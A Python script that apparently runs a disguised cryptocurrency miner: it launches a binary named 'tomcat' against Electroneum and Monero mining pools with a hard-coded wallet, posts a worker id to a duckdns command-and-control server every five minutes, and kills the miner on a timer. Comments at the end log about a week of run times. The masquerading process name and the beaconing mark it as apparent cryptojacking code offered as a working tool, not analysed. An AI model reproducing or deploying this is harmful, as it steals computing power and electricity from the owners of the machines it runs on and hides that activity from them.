import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:16:07.655500
#2018-02-17 16:03:06.093024
#2018-02-17 17:49:04.733715
#2018-02-17 19:37:01.246670
#2018-02-17 21:25:07.377152
#2018-02-17 23:09:04.044586
#2018-02-18 00:57:01.639981
#2018-02-18 02:45:07.454926
#2018-02-18 04:34:06.260971
#2018-02-18 06:25:03.748019
#2018-02-18 08:13:04.256899
#2018-02-18 09:59:07.831777
#2018-02-18 11:46:07.690666
#2018-02-18 13:30:04.385813
#2018-02-18 15:20:07.626030
#2018-02-18 17:09:04.141662
#2018-02-18 18:56:04.671957
#2018-02-18 20:43:04.719867
#2018-02-18 22:27:03.413048
#2018-02-19 00:16:06.070451
#2018-02-19 02:02:06.249676
#2018-02-19 03:48:03.140412
#2018-02-19 05:32:04.535621
#2018-02-19 07:20:07.777154
#2018-02-19 09:09:06.975387
#2018-02-19 10:58:06.510139
#2018-02-19 12:47:06.799634
#2018-02-19 14:36:01.530184
#2018-02-19 16:23:11.132391
#2018-02-19 18:10:10.225902
#2018-02-19 19:57:03.816025
#2018-02-19 21:46:01.987632
#2018-02-19 23:34:02.119653
#2018-02-20 01:20:07.068562
#2018-02-20 03:10:05.746334
#2018-02-20 04:57:04.335611
#2018-02-20 06:39:06.224819
#2018-02-20 08:24:06.974056
#2018-02-20 10:10:08.085738
#2018-02-20 11:54:09.160225
#2018-02-20 13:43:01.895885
#2018-02-20 15:28:05.225779
#2018-02-20 17:15:03.909885
#2018-02-20 19:05:10.577547
#2018-02-20 20:55:07.166656
#2018-02-20 22:39:04.998857
#2018-02-21 00:22:08.526140
#2018-02-21 02:07:03.319264
#2018-02-21 03:56:04.352299
#2018-02-21 05:45:08.400842
#2018-02-21 07:34:15.127144
#2018-02-21 09:19:06.692992
#2018-02-21 11:08:01.456276
#2018-02-21 12:55:01.840095
#2018-02-21 14:42:07.000403
#2018-02-21 16:28:10.837629
#2018-02-21 18:18:06.696299
#2018-02-21 20:03:03.973828
#2018-02-21 21:50:02.903747
#2018-02-21 23:38:01.525003
#2018-02-22 01:26:01.936890
#2018-02-22 03:14:07.547933
#2018-02-22 05:01:05.709483
#2018-02-22 06:45:04.353759
#2018-02-22 08:34:08.493867
#2018-02-22 10:21:06.885475
#2018-02-22 12:07:05.956807
#2018-02-22 13:52:05.452333
#2018-02-22 15:40:11.442842
#2018-02-22 17:26:10.824101
#2018-02-22 19:14:09.467126
#2018-02-22 21:05:08.768420
#2018-02-22 22:51:06.142135
#2018-02-23 00:38:03.123583
#2018-02-23 02:23:07.618515
#2018-02-23 04:13:06.502508
#2018-02-23 05:57:06.426521
#2018-02-23 07:47:03.286718
#2018-02-23 09:53:05.193460
#2018-02-23 11:58:01.434833
#2018-02-23 13:46:09.511854
#2018-02-23 15:36:07.602627
#2018-02-23 17:25:04.304649
#2018-02-23 19:10:12.037052
#2018-02-23 20:56:05.993045
#2018-02-23 22:38:01.464930
#2018-02-24 00:24:05.121147
#2018-02-24 02:16:03.504354
#2018-02-24 04:05:06.822105
#2018-02-24 05:50:02.248681
#2018-02-24 07:38:06.403602
#2018-02-24 09:23:01.975419
#2018-02-24 11:16:07.402938
#2018-02-24 13:05:06.391876
#2018-02-24 14:54:06.106116
#2018-02-24 16:44:06.080052
#2018-02-24 18:32:03.864100
#2018-02-24 20:18:06.347272
#2018-02-24 22:12:03.259049
#2018-02-25 01:09:01.288365
#2018-02-25 04:48:06.933713
#2018-02-25 09:11:01.474541